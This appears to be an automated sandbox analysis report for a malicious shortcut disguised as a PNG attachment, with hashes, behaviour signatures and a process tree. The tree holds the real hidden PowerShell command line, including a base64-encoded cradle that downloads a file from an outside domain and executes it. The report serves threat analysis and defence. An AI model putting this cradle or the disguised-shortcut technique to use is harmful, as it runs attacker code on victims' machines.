Overview
overview
10Static
static
104bd/472-84...mp.dll
windows7_x64
34bd/472-84...mp.dll
windows10_x64
34bd/Attach...ng.lnk
windows7_x64
84bd/Attach...ng.lnk
windows10_x64
8Attachment.png.lnk
windows7_x64
8Attachment.png.lnk
windows10_x64
8work.ps1
windows7_x64
8work.ps1
windows10_x64
84bd/ldr.dat.ps1
windows7_x64
104bd/ldr.dat.ps1
windows10_x64
14bd/work.ps1
windows7_x64
84bd/work.ps1
windows10_x64
8Analysis
-
max time kernel
17s -
max time network
115s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
25-08-2021 20:27
Static task
static1
Behavioral task
behavioral1
Sample
4bd/472-84-0x000000001A910000-0x000000001A919000-memory.dmp.dll
Resource
win7v20210408
Behavioral task
behavioral2
Sample
4bd/472-84-0x000000001A910000-0x000000001A919000-memory.dmp.dll
Resource
win10v20210410
Behavioral task
behavioral3
Sample
4bd/Attachment.png.lnk
Resource
win7v20210408
Behavioral task
behavioral4
Sample
4bd/Attachment.png.lnk
Resource
win10v20210410
Behavioral task
behavioral5
Sample
Attachment.png.lnk
Resource
win7v20210408
Behavioral task
behavioral6
Sample
Attachment.png.lnk
Resource
win10v20210410
Behavioral task
behavioral7
Sample
work.ps1
Resource
win7v20210410
Behavioral task
behavioral8
Sample
work.ps1
Resource
win10v20210408
Behavioral task
behavioral9
Sample
4bd/ldr.dat.ps1
Resource
win7v20210410
Behavioral task
behavioral10
Sample
4bd/ldr.dat.ps1
Resource
win10v20210408
Behavioral task
behavioral11
Sample
4bd/work.ps1
Resource
win7v20210410
Behavioral task
behavioral12
Sample
4bd/work.ps1
Resource
win10v20210408
General
-
Target
4bd/Attachment.png.lnk
-
Size
1KB
-
MD5
15482111f86159dc4cca2034e5520350
-
SHA1
7745a383710aa802613daaa245b456c77149d437
-
SHA256
a0e0df53e65b8b4f229eeec3e5c839b9436910a2830854b9e52aa11cd2155d4b
-
SHA512
6190c2808eb2712583a0c7b930d8bb6ca3628dcfdcfcc46b86153757b271220aa37d5fe6aed571a6575e941e3b222e29e086905c27eef85a2046d8108b66f92c
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 12 2688 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 1016 2688 WerFault.exe powershell.exe -
Suspicious behavior: EnumeratesProcesses 22 IoCs
Processes:
powershell.exepowershell.exeWerFault.exepid process 2468 powershell.exe 2468 powershell.exe 2468 powershell.exe 2688 powershell.exe 2688 powershell.exe 2688 powershell.exe 1016 WerFault.exe 1016 WerFault.exe 1016 WerFault.exe 1016 WerFault.exe 1016 WerFault.exe 1016 WerFault.exe 1016 WerFault.exe 1016 WerFault.exe 1016 WerFault.exe 1016 WerFault.exe 1016 WerFault.exe 1016 WerFault.exe 1016 WerFault.exe 1016 WerFault.exe 1016 WerFault.exe 1016 WerFault.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.exeWerFault.exedescription pid process Token: SeDebugPrivilege 2468 powershell.exe Token: SeDebugPrivilege 2688 powershell.exe Token: SeDebugPrivilege 1016 WerFault.exe -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 2236 wrote to memory of 2468 2236 cmd.exe powershell.exe PID 2236 wrote to memory of 2468 2236 cmd.exe powershell.exe PID 2468 wrote to memory of 2688 2468 powershell.exe powershell.exe PID 2468 wrote to memory of 2688 2468 powershell.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\4bd\Attachment.png.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:2236 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -w h -noexit -file work.ps12⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2468 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -enc JABNAD0AWwBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoAQwByAGUAYQB0AGUAKAAnAGgAdAB0AHAAOgAvAC8AYQB0AGgAaQBuAGcAYwBhAGwAbABlAGQAYwBhAGsAZQAuAGMAbwBtAC8AZgBpAGwAZQAnACkAOwAkAHQAPQAkAE0ALgBHAGUAdABSAGUAcwBwAG8AbgBzAGUAKAApADsAJABSAD0AJAB0AC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlAFMAdAByAGUAYQBtACgAKQA7ACQARgA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAgACQAUgA7ACQAcAA9ACQARgAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AGkAZQB4ACgAJABwACkAOwAgAA==3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2688 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2688 -s 24924⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1016